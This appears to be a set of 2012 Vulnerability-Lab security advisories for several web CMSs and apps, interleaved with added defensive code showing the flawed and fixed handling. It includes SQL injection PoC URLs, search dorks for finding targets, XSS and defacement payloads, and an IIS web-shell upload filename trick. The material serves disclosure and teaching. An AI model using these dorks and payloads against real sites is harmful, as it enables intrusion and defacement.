http://www.vulnerability-lab.com/get_content.php?id=655


VL-ID:
=
655


Common Vulnerability Scoring System:

7.3


Introduction:
=
Joomla is a free and open source content management system (CMS) for publishing 
content on the World
Wide Web and intranets and a model–view–controller (MVC) Web application 
framework that can also be
used independently.

Joomla is written in PHP, uses object-oriented programming (OOP) techniques and 
software design
patterns, stores data in a MySQL database, and includes features such as page 
caching,
RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and 
support for language
internationalization.

Joomla had been downloaded 23 million times. Between March 2007 and February 
2011 there had been
more than 21 million downloads. As of November 2011, there are over 8,600 free 
and commercial
extensions available from the official Joomla! Extension Directory and more 
available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a 
SQL Injection Vulnerability in 
the com_fireboard module of the joomla CMS.


Report-Timeline:

2012-07-11: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A SQL injection vulnerability was detected in the com_fireboard module of the 
Joomla Content Management System. Remote attackers & low-privileged user 
accounts can inject their own SQL commands to compromise the application DBMS. 
The vulnerability is located in the com_fireboard module, in the bound 
vulnerable func parameter (func=fb_pdf). Successful exploitation results in 
DBMS (server) or application (web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_fireboard

Vulnerable Parameter(s):
[+] func (fb_pdf)


Proof of Concept:
=
The SQL injection vulnerability can be exploited by remote attackers without 
user interaction & with a low-privileged user account. For demonstration or 
reproduction ...

Dork(s):
inurl:id=  intext:/com_fireboard/

PoC:
http://[TARGET]/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION]

Reference(s):
xxx.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
xxx.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
xxx.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242



Arasism (IR) CMS - File Upload Vulnerability

2012-08-09 Thread Vulnerability Lab
Title:
==
Arasism (IR) CMS - File Upload Vulnerability


Date:
=
2012-07-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=657


VL-ID:
=
657


Common Vulnerability Scoring System:

6.5


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a 
File Upload Vulnerability in the Arasism CMS.


Report-Timeline:

2012-07-12: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A file upload vulnerability was detected in the well-known Iranian Arasism.com 
Content Management (Panel) System. The vulnerability allows a remote attacker 
with a low-privileged user account to bypass the picture upload validation by 
including own .asp/.php files. Successful exploitation results in malicious 
file uploads (malware or webshells) that compromise the application DBMS & 
the application system.

Vulnerable Path:
[+] ../sysop/


Vulnerable File(s):
[+] RTE_popup_file_atch.asp


Proof of Concept:
=
The remote file upload vulnerability can be exploited by remote attackers 
without user interaction. For demonstration or reproduction ...


Dork(s):
Powered by Arasism.com
Designed & Powered By Hadi Farzad
Powered By : www.Arasism.Com
طراحی و اجرا : هادی فرزاد | پیشگامان وب فردا
(Persian: "Design and implementation : Hadi Farzad | Pishgaman Web Farda")


PoC:
Path:   ../sysop/
File:   RTE_popup_file_atch.asp
NOTE:   To upload an ASP web shell, submit a filename such as ...
        shell.asp;1.jpg
        (IIS 6 stops parsing the script name at the semicolon, so the file 
        is executed as shell.asp while an extension check only sees .jpg)
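Added example, not Arasism's code: a Python upload gate that shows why a last-extension check accepts shell.asp;1.jpg, and what a hardened check does instead: reject path separators, NUL bytes and ';' in the client's name, allow exactly one extension from an allow-list, require the file's leading bytes to match that type, and store under a server-generated name. The allow-list, magic-byte table and sample contents are constructed for this example.

```python
import os
import secrets

ALLOWED = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the accepted image formats (constructed lookup, not exhaustive).
MAGIC = [
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
]

# Constructed samples: a minimal JPEG header and a harmless ASP snippet standing
# in for a web shell (anything ASP would do to show the bypass).
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 12
ASP_BYTES = b'<% Response.Write("asp runs here") %>'


def naive_is_image(filename):
    """The check the advisory defeats: it only looks at what follows the last dot,
    so 'shell.asp;1.jpg' counts as a jpg here but runs as shell.asp on IIS 6."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def validate_upload(filename, content):
    """Return a safe server-side name for the upload, or raise ValueError."""
    # 1. No path components, NUL bytes or IIS ';' truncation in the client name.
    if os.path.basename(filename.replace("\\", "/")) != filename:
        raise ValueError("path separators in filename")
    if "\x00" in filename or ";" in filename:
        raise ValueError("NUL or ';' in filename")
    # 2. Exactly one extension and it must be allow-listed (rejects a.asp.jpg too).
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED:
        raise ValueError("extension not allowed")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    # 3. The bytes must actually be that image type, not an ASP/PHP script.
    kind = next((k for magic, k in MAGIC if content.startswith(magic)), None)
    if kind != ext:
        raise ValueError("content does not match extension")
    # 4. Never reuse the client's name: random base name, server-chosen extension.
    return f"{secrets.token_hex(16)}.{ext}"


def is_rejected(filename, content):
    """Convenience for callers and tests: True if validate_upload refuses the file."""
    try:
        validate_upload(filename, content)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive check accepts shell.asp;1.jpg:", naive_is_image("shell.asp;1.jpg"))
    print("hardened check rejects it:", is_rejected("shell.asp;1.jpg", ASP_BYTES))
    print("clean upload stored as:", validate_upload("photo.jpg", JPEG_BYTES))
```

Even with this gate, the upload directory should be served with script execution disabled; the name and content checks stop the trick in the advisory, the execution policy stops the next one.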


Risk:
=
The security risk of the remote file upload vulnerability is estimated as high.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242




Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities

2012-08-14 Thread Vulnerability Lab
<input value="[NON PERSISTENT SCRIPT CODE]" class="numeric field_from w50" 
type="text" name="f[price][from]" maxlength="15"><img alt="" 
src="http://general.demoflynax.com/templates/general_modern/img/blank.gif" 
class="between" /><input value="<iframe src=a" class="numeric field_to w50" 
type="text" name="f[price][to]" maxlength="15" />
</div>

URL: http://general.[SERVER]:1339/search.html


Risk:
=
1.1
The security risk of the remote sql injection vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).

1.3
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)




7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

2012-08-14 Thread Vulnerability Lab
Title:
==
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities 


Date:
=
2012-08-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=679


VL-ID:
=
680


Common Vulnerability Scoring System:

8.3


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
multiple SQL Injection Vulnerabilities in the 7sepehr CMS.


Report-Timeline:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL injection vulnerabilities were detected in the official 
7sepehr.com Content Management System 2012. Remote attackers can inject their 
own SQL commands to compromise the affected application DBMS. The 
vulnerabilities are located in the news_Detail, newsview and contents ASP 
modules, in the bound vulnerable id parameter. Successful exploitation of the 
remote SQL injection vulnerabilities results in DBMS or web application 
compromise.


Vulnerable File(s):
[+] news_Detail.asp
[+] newsview.asp
[+] contents.aspx

Vulnerable Parameter(s):
[+] id



Proof of Concept:
=
The remote SQL injection vulnerabilities can be exploited by remote attackers 
without a privileged user account & without user interaction. For 
demonstration or reproduction ...

Dork:  `Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]--
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION VULNERABILITY]--
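Added example, not 7sepehr's code: the three PoC URLs share one shape, a numeric id interpolated unquoted into the query, so id=-1 union all select ... empties the real result set and substitutes attacker-chosen columns. The Python/sqlite3 below reproduces that against a constructed news table and shows the fix: parse the id as an integer, reject anything else, then bind it. Table names, rows and the injected column names are constructed for this schema. (The Joomla com_fireboard case earlier on this page is the same bug class in a string context, where the PoC's trailing ' closes a quoted literal instead.)

```python
import sqlite3

# The advisory's PoC shape with concrete column names (constructed for this schema).
INJECTED_ID = "-1 union all select username, pw_hash from admins--"


def make_demo_db():
    """Constructed schema: a public news table and a table the page never queries."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news   (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First article');
        CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO admins VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def news_detail_vulnerable(db, id_param):
    """id interpolated as text.  id=-1 matches no article, and the UNION ALL the
    attacker appends only has to match the two selected columns to be accepted."""
    sql = f"SELECT title, body FROM news WHERE id = {id_param}"
    return db.execute(sql).fetchall()


def news_detail_fixed(db, id_param):
    """Type-check first: an article id is a non-negative integer and nothing else.
    Then bind it, so even a numeric-looking string never becomes SQL syntax."""
    try:
        article_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    if article_id < 0:
        raise ValueError("id must be non-negative")
    return db.execute("SELECT title, body FROM news WHERE id = ?", (article_id,)).fetchall()


def fixed_rejects(db, id_param):
    """True if the hardened handler refuses the parameter."""
    try:
        news_detail_fixed(db, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_demo_db()
    print("legit:     ", news_detail_vulnerable(db, "1"))
    print("vulnerable:", news_detail_vulnerable(db, INJECTED_ID))   # admin row leaks
    print("fixed:     ", fixed_rejects(db, INJECTED_ID))            # True
```

Binding alone would also have stopped this (a bound value is never parsed as SQL); the integer check on top gives a clean 400-style error instead of a DBMS type error and keeps negative ids out of the query.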


Risk:
=
The security risk of the remote sql injection vulnerabilities are estimated as 
critical.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242




Social Engine v4.2.5 - Multiple Web Vulnerabilities

2012-08-17 Thread Vulnerability Lab
Title:
==
Social Engine v4.2.5 - Multiple Web Vulnerabilities


Date:
=
2012-07-31


References:
===
http://www.vulnerability-lab.com/get_content.php?id=672


VL-ID:
=
672


Common Vulnerability Scoring System:

3


Abstract:
=
A Laboratory Researcher [X-Cisadane] discovered multiple Web Vulnerabilities in 
the Social Engine v4.2.5 web application.


Report-Timeline:

2012-07-31: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

1.1
Multiple persistent input validation vulnerabilities were detected in the 
Social Engine v4.2.5 web application. The bug allows an attacker to inject 
malicious script code on the application side (persistent). The persistent 
vulnerabilities are located in the add new videos and classifieds modules, in 
the bound vulnerable tags (keywords) parameter. Successful exploitation can 
lead to persistent session hijacking (manager/admin) or stable (persistent) 
context manipulation. Exploitation requires low user interaction but a 
privileged user account.


Vulnerable Module(s):
  [+] Add New Video
  [+] Add New Classifieds


Affected Module(s):
  [+] Videos Listing Page
  [+] Classifieds Listing Page


Vulnerable Parameter(s):
  [+] Tags (keywords)


1.2
A non-persistent cross site scripting vulnerability was detected in the Social 
Engine v4.2.5 web application. The vulnerability allows remote attackers to 
hijack website customer, moderator or admin sessions; it requires medium or 
high user interaction or a local low-privileged user account. The bug is 
located in the signup (profile) module, in the bound vulnerable name and 
address parameters. Successful exploitation can result in account theft, 
client-side phishing & client-side content request manipulation. Exploitation 
requires medium or high user interaction & no privileged web application user 
account.

Vulnerable Module(s):
[+] Profile - Signup

Vulnerable Parameter(s):
[+] Name & Address


Proof of Concept:
=
1.1
The persistent vulnerability can be exploited by remote attackers with low 
required user interaction & a low-privileged application user account. For 
demonstration or reproduction ...


- In the Post New Video page (http://127.0.0.1:8080/videos/create)
Information:Copy & paste persistent malicious script code (js/html) into the 
Tags (keywords) field and save the context


- In the Post New Classifieds Listing page 
(http://127.0.0.1:8080/classifieds/create)
Information:Copy & paste persistent malicious script code (js/html) into the 
Tags (keywords) field and save the context


Picture :   http://i47.tinypic.com/2ptcv29.png
Picture :   http://i50.tinypic.com/14soaci.png


PoC:

DIV align=left
DIV id=Layer1 style=BORDER-RIGHT: #00 1px; BORDER-TOP: #00 1px; 1; 
LEFT: 1px; 

BORDER-LEFT: #00 1px; WIDTH: 1500px; BORDER-BOTTOM: #00 1px; POSITION: 
absolute; 

TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #00; layer-background-color: 
#00 
br /br /
br
center
font face=Arial color=red size=4strongbrbrbrDefaced By : 
X-Cisadane
br
/center 
font face=Courier New color=#FF size=3centerGreetz To : X-Code, 
Borneo Crew, 

Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda 

Utari/center/font 
centerimg 

src=http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif;/img/center
centerfont face=arial size=3 color=#FF 
marquee behavior=alternate scrolldelay=100 style=width: 90%Please fix 
your hole!
/li
/ul
/td
/tr
/table
/div



1.2
The non-persistent cross-site scripting vulnerability can be exploited by 
remote attackers with medium or high required user interaction and without 
a privileged user account. For demonstration or to reproduce ... 

Information: Copy & Paste cross-site scripting (script code) into the 
Profile Address Field of the signup form
URL:http://127.0.0.1:8080/signup

Picture :   http://i45.tinypic.com/v46iyd.png
Picture :   http://i49.tinypic.com/156e79h.png



Risk:
=
1.1
The security risk of the persistent web vulnerabilities is estimated as 
medium(+).

1.2
The security risk of the client-side cross-site scripting vulnerability is 
estimated as low(+).


Credits:

X-Cisadane



ShopperPress v2.7 Wordpress - SQL Injection Vulnerability

2012-08-17 Thread Vulnerability Lab
Title:
==
ShopperPress v2.7 Wordpress - SQL Injection Vulnerability


Date:
=
2012-08-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=669


VL-ID:
=
669


Common Vulnerability Scoring System:

6.1


Introduction:
=
ShopperPress is a Premium Wordpress theme with addon that transform Wordpress 
into a fully functionality online store with shopping cart functionality. 
ShopperPress is the ideal solution for anyone who wants to sell products 
& services, digital downloads or affiliate products online, you can even setup 
a catalog website. ShopperPress has been designed and tested to make setup and 
store management easy. Suitable for users of all levels, ShopperPress makes 
running an online store enjoyable whilst giving you all the professional tools 
required. ShopperPress has been optimized for search engines helping your store 
quickly rank high in all major search engines. You can also add-on Wordpress 
SEO plugins to help you customize meta tags and page titles. ShopperPress can 
create online stores, affiliate stores and even catalog websites. Every copy of 
ShopperPress includes Amazon, Ebay and CSV import tools, 20+ payment gateways, 
20+ store designs, shipping, tax, promotions, coupons, emails and lots more! 
ShopperPress includes 20+ different payment gateways allowing you to choose how 
your visitors pay for your products/services. We have integration for Paypal 
(standard and Pro), 2Checkout, Worldpay, eWay, Google Checkout, Authorize.net 
and lots more. Built into ShopperPress are 20+ different store designs to 
choose from, all included free! Customizing your theme is quick and easy using 
the on/off display options found in the admin area with full support for 
plugins & widgets. ShopperPress has a built in order management system allowing 
you to manage your orders. You can easily view your order history, export to 
CSV, view product, billing and shipping details as well as print off customer 
invoices. With ShopperPress you can create custom product options such as 
colors and sizes. You can create up to 6 different product values which will 
be passed with the product to checkout as well as allow members to upload 
files. [24/7 Customer Support] We work hard to ensure our customers are 100% 
satisfied with our product which is why we offer a 24/7 customer support 
services.

(Copy of the Vendor Website:  http://shopperpress.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a SQL Injection 
Vulnerability in the Shopperpress official Premium Wordpress Theme and Addon 
v2.7.


Report-Timeline:

2012-08-01: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A SQL Injection vulnerability is detected in the Shopperpress official Premium 
Wordpress Theme and Addon v2.7. 
Remote attackers with privileged user accounts and module access can 
inject their own SQL commands to compromise 
the WordPress application DBMS. The vulnerability is located in the listing 
module with the bound vulnerable 
id parameter. Exploitation requires a privileged user account or module access 
rights.

Vulnerable Module(s):
[+] Listing - [Edit]

Vulnerable Parameter(s):
[+] ID


Proof of Concept:
=
The SQL injection vulnerability can be exploited by a privileged WordPress user 
account without user interaction. For demonstration or to reproduce ...

PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--

--- SQL Exception Logs ---
 You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right 
syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on 
line: 80


Solution:
=
The vulnerability can be patched by parsing the id parameter of the edit 
functions in the addon module files.
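The fix the solution describes, written out as an added example. This is not ShopperPress code: the table name `pp_orders`, the function names `pp_get_order_for_edit_unsafe()`, `pp_get_order_for_edit()` and `pp_handle_edit()`, and the capability and nonce names are all assumptions; only the statement shape (`... GROUP BY order_id LIMIT 1`) is taken from the SQL exception log above. The unsafe variant mirrors the defect class (the raw `id` value concatenated into the statement); the hardened one validates the value as an integer and binds it through `$wpdb->prepare()`.

```php
<?php
// Added example, not ShopperPress code. Assumed names: the pp_orders table and the
// pp_get_order_for_edit_unsafe(), pp_get_order_for_edit() and pp_handle_edit()
// functions. Needs the WordPress runtime ($wpdb, absint, current_user_can,
// check_admin_referer, wp_unslash, wp_die).

// BEFORE (hypothetical, mirrors the defect class): the raw request value is
// concatenated into the statement. A quote in the id closes the literal and
// everything after it is parsed as SQL, which is exactly what the MySQL error
// quoted in the advisory ("... near '...' GROUP BY order_id LIMIT 1'") shows.
function pp_get_order_for_edit_unsafe( $raw_id ) {
    global $wpdb;
    $table = $wpdb->prefix . 'pp_orders';
    $sql   = "SELECT * FROM {$table} WHERE id = '" . $raw_id . "' GROUP BY order_id LIMIT 1";
    return $wpdb->get_row( $sql );
}

// AFTER: validate the type first, then bind the value. %d in prepare() forces an
// integer, so nothing the client sends can alter the statement's structure.
function pp_get_order_for_edit( $raw_id ) {
    global $wpdb;

    // ctype_digit() on the string form is stricter than a cast: "5-2613" and
    // "5'" are rejected here instead of silently becoming 5.
    if ( ! is_string( $raw_id ) || ! ctype_digit( $raw_id ) || '0' === $raw_id ) {
        return null;
    }
    $id    = absint( $raw_id );
    $table = $wpdb->prefix . 'pp_orders';

    $sql = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE id = %d GROUP BY order_id LIMIT 1",
        $id
    );
    return $wpdb->get_row( $sql );
}

// Hypothetical handler behind admin.php?page=orders&id=...
function pp_handle_edit() {
    // The advisory says exploitation needs a privileged account; a capability
    // check plus a nonce keeps the edit function away from lower roles and CSRF.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'pp_edit_order' );

    $raw_id = isset( $_GET['id'] ) ? (string) wp_unslash( $_GET['id'] ) : '';
    $order  = pp_get_order_for_edit( $raw_id );
    if ( null === $order ) {
        wp_die( 'Invalid order id', '', array( 'response' => 400 ) );
    }
    // Render the edit form for $order, passing every field through
    // esc_html() / esc_attr() on the way into the page.
}
```

`%d` makes the binding a type constraint rather than an escape: whatever the client sends, the statement structure cannot change. The explicit `ctype_digit()` check in front of it turns a malformed id into a 400 instead of a silent coercion, which is also the behaviour you want to see in the access logs when someone probes the parameter.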


Risk:
=
The security risk of the sql injection vulnerability is estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



ShopperPress v2.7 Wordpress - Cross Site Vulnerabilities

2012-08-17 Thread Vulnerability Lab
; 
color:#666;padding:5px; value=Search Files
/form
div class=clearfix/div
form class=plain method=post name=orderform id=orderform
input type=hidden name=deleteimages value=1

   
Review: Member Add/Edit Listing

ul
lia rel=premiumpress_tab1 href=# class=activeDetails/a/li
lia href=# onclick=window.location.href='admin.php
?page=orderscid=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) 
width=800Order History/a/li
!--lia href=admin.php?page=membersSearch Results/a/li--
/ul
/div
div id=videobox1/div
form method=post target=_self enctype=multipart/form-data
input name=action type=hidden value=edit /
input name=userdata[ID] type=hidden value=5[CLIENT SIDE MALICIOUS 
SCRIPT CODE])  /
input type=hidden value= name=showThisTab id=showThisTab /
div id=premiumpress_tab1 class=content


Review: EMail Add/Edit

div id=premiumpress_tab1 class=content
form class=fields method=post target=_self enctype=multipart/form-data
input name=action value=edit type=hidden
input name=ID value= 
type=hidden[CLIENT SIDE MALICIOUS SCRIPT CODE];) width=800
input type=hidden name=form[email_type] value=email /
fieldset
div class=titlehh3Email Options/h3/div


Solution:
=
The vulnerability can be patched by parsing the orders, id & search web 
application parameters.


Risk:
=
The security risk of the non-persistent cross-site scripting vulnerabilities 
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



Nike+ Panel Mobile App - Multiple Web Vulnerabilities

2012-08-17 Thread Vulnerability Lab
Title:
==
Nike+ Panel & Mobile App - Multiple Web Vulnerabilities


Date:
=
2012-08-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=663


VL-ID:
=
663


Common Vulnerability Scoring System:

3.5


Introduction:
=
The Nike+ FuelBand records your daily activities using a sports-tested 
three-axis accelerometer. 
It then converts every movement into NikeFuel. The Nike+ FuelBand records 
running, walking, dancing, basketball and the results 
of a wide range of everyday activities. You can also sync the results 
with a motivating mobile website. 
So: put it on and get going. How active do you want to be? Set 
your daily goal. The Nike+ FuelBand measures your 
progress and shows it to you over the course of the day with a colour display 
from red to green. When you reach the green zone, 
you have reached your goal. Make every day a new game. Break records, 
reach new milestones and unlock special 
achievements. Ride a wave of success and see how many 
days in a row you can hit your daily goal.

(Copy of the Homepage: http://nikeplus.nike.com/plus/ )

A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above 
installed to use the Nike+ FuelBand app.

Description

Nike+ FuelBand measures your everyday activity and turns it into NikeFuel. It 
also tracks each step and calorie burned. 
The App talks to your Nike+ FuelBand, allowing you to see your progress on your 
mobile device and get the motivation 
you need to get moving.

• Sync wirelessly, set your Daily Goal directly from the App and decide how 
much NikeFuel you want to earn that day.
• Sync your Nike+ FuelBand throughout the day to track your NikeFuel and try to 
hit your Daily Goal.
• See your daily activity breakdown and view your progress by week, month, 
or year.
• View your achievement celebrations and save your badges in your trophycase. 
Bragging optional.
• Connect, compare and compete with your Facebook friends. See your daily and 
weekly NikeFuel totals on a social leaderboard.
• Keep track of your streaks. See how many days in a row you can reach 
your Daily Goal.
• Keep track of your personal bests. Set your records and try to break them.
• Get notified every time you earn a trophy, beat a record, or reach a 
milestone.
• Manage your Nike+ profile and settings on the go.
• Write about your day and keep a personal record of how you felt. See 
what makes you tick.
• Share your NikeFuel and achievements with friends on Facebook and Twitter. 
Get cheered on and stay motivated.
• Stay connected to the rest of the Nike+ community.
• The app automatically sends all your information to your Nike+ profile online.
• Nike+ FuelBand Device required.

(Copy of the Homepage: 
http://itunes.apple.com/de/app/nike+-fuelband/id493325070?mt=8# )


Abstract:
=
Vulnerability-Lab Team discovered multiple Web Vulnerabilities in the Nike+ 
Control Panel & fuelband mobile web application.


Report-Timeline:

2012-04-06: Researcher Notification & Coordination
2012-05-28: Vendor Notification 1
2012-06-09: Vendor Notification 2
2012-07-22: Vendor Notification 3
2012-08-01: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the Nike+ 
Control Panel & fuelband mobile web application.
The bugs allow an attacker to inject malicious script code on the 
application side (persistent). 

The first persistent vulnerability is located in the profile username input 
with the bound vulnerable name normal_font listing.
The persistent code gets executed from the mobile application username listing 
& the nike+ index panel username profile listing.

The second persistent vulnerability is located in the facebook friends module 
& the bound vulnerable facebook friend name listing.
The persistent code gets executed from the friends (management) module when 
processing the addition of a user with a malicious string in the facebook name.

The third vulnerability is located in the nike+ search module for members and 
the bound vulnerable alt_header_font title listing.
The 3rd vulnerability is located on the client side of the application and gets 
executed when a registered malicious username is searched.
By injecting own script code directly, without an existing user, the code 
is executed on the client side of the search module.

Successful exploitation of the vulnerability can lead to persistent session 
hijacking (manager/admin) or stable (persistent) 
context manipulation in mobile apps or panels via sync. Exploitation requires 
low user inter

ManageEngine OpStor v7.4 - Multiple Web Vulnerabilities

2012-08-17 Thread Vulnerability Lab
PoC:
http://opstor.127.0.0.1:1338/availability730.do
?days=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe
name=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe


Solution:
=
2012-08-07: Vendor Fix/Patch

Manual steps to apply the patch/fix:

1. Download the patch and place it in the AppManager_home directory 
(AppManager_Home is the directory in which Applications Manager is installed; 
the default location is C://Program Files (x86)/ManageEngine/AppManager10).

2. Extract the patch under AppManager_home. If prompted to replace a file, 
replace the existing file with the file from the patch (or extract the zip 
file and copy the server.xml from the zip to the location shown in the 
structure below).

3. After extracting, ensure you have the Server.xml file as per the structure 
below:

 AppManager_home
|
.working
...apache
...tomcat
...conf
...backup
.server.xml 


4. Shut Down Applications Manager Software
5. Rename Logs folder path or variable
6. Start Applications Manager after the change
7. Done!


PATCH DOWNLOAD: 
http://bonitas.zohocorp.com/customer_uploads/2012_8_16_10_12_39_BadInput_10600.zip
 


Risk:
=
1.1
The security risk of the blind SQL injection vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.3
The security risk of the client-side cross-site vulnerabilities is estimated 
as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]




eFront Educational v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab
Title:
==
eFront Educational v3.6.11 - Multiple Web Vulnerabilities


Date:
=
2012-08-03


References:
===
http://www.vulnerability-lab.com/get_content.php?id=666


VL-ID:
=
666


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tailored with larger organizations in mind, eFront Educational offers solutions 
for the management of companies most 
valued asset - the people. Based on a coherent approach to human capital 
management which keeps the workforce actively 
engaged, the eFront Educational platform offers the means of aligning learning 
programs with business goals to cultivate 
employee skills and knowledge associated with business performance. eFront 
Enterprise builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )


Abstract:
=
A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team 
discovered multiple web vulnerabilities in eFront v3.6.11 Educational.


Report-Timeline:

2011-08-03: Public Disclosure


Status:

Published


Affected Products:
==
eFront
Product: Educational v3.6.11


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the eFront 
Educational v3.6.11 Content Management System.
The vulnerabilities allow remote attackers to inject malicious script 
code on the application side (persistent).
The first vulnerability is located in the profile module with the bound 
vulnerable firstname & lastname parameters. The bug 
allows a low-privileged student account to exploit higher-privileged trainer or 
administrator user accounts via registration.
Exploitation of the first vulnerability requires a low-privileged student 
e-learning application user account.
The second vulnerability is located in the Messages - New Folder Name module 
with the bound vulnerable folder listing.
Exploitation of the second vulnerability requires a low-privileged student user 
account and is only locally exploitable.
Successful exploitation of the vulnerabilities can lead to persistent session 
hijacking (manager/admin) or stable 
(persistent) context manipulation. 


Vulnerable Module(s):
[+] Profile - User (Administrator User Listing)
[+] Messages


Vulnerable Parameters(s):
[+] Firstname & Lastname
[+] Foldername
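The two persistent issues here (firstname & lastname in the user listing, folder name in the messages listing) and the Social Engine Tags (keywords) issue earlier in this digest share one shape: a free-text field is stored and later written into an HTML listing without encoding. The plain-PHP example below is added here and is not eFront or Social Engine code; the function names, length limits and character allowlists are assumptions. It validates both field kinds on input and entity-encodes every stored value on output, so a value that reached storage before validation existed is still neutralised when it is listed.

```php
<?php
// Added example, not eFront or Social Engine code. Plain PHP, no framework.
// Function names, limits and allowlists below are assumptions for illustration.
declare(strict_types=1);

const TAG_MAX_LEN  = 40;
const TAGS_MAX     = 20;
const NAME_MAX_LEN = 64;

/**
 * Input side for a Tags (keywords) field: take the comma-separated string and
 * return the normalised list, or null if any tag falls outside the allowlist.
 * Letters of any script, digits, space, hyphen and underscore only, so the
 * characters HTML cares about ('<', '>', '"', "'", '&') never reach storage.
 */
function validate_tags(string $raw): ?array {
    $tags = [];
    foreach (explode(',', $raw) as $tag) {
        $tag = trim($tag);
        if ($tag === '') {
            continue;                       // ignore empty entries such as "a,,b"
        }
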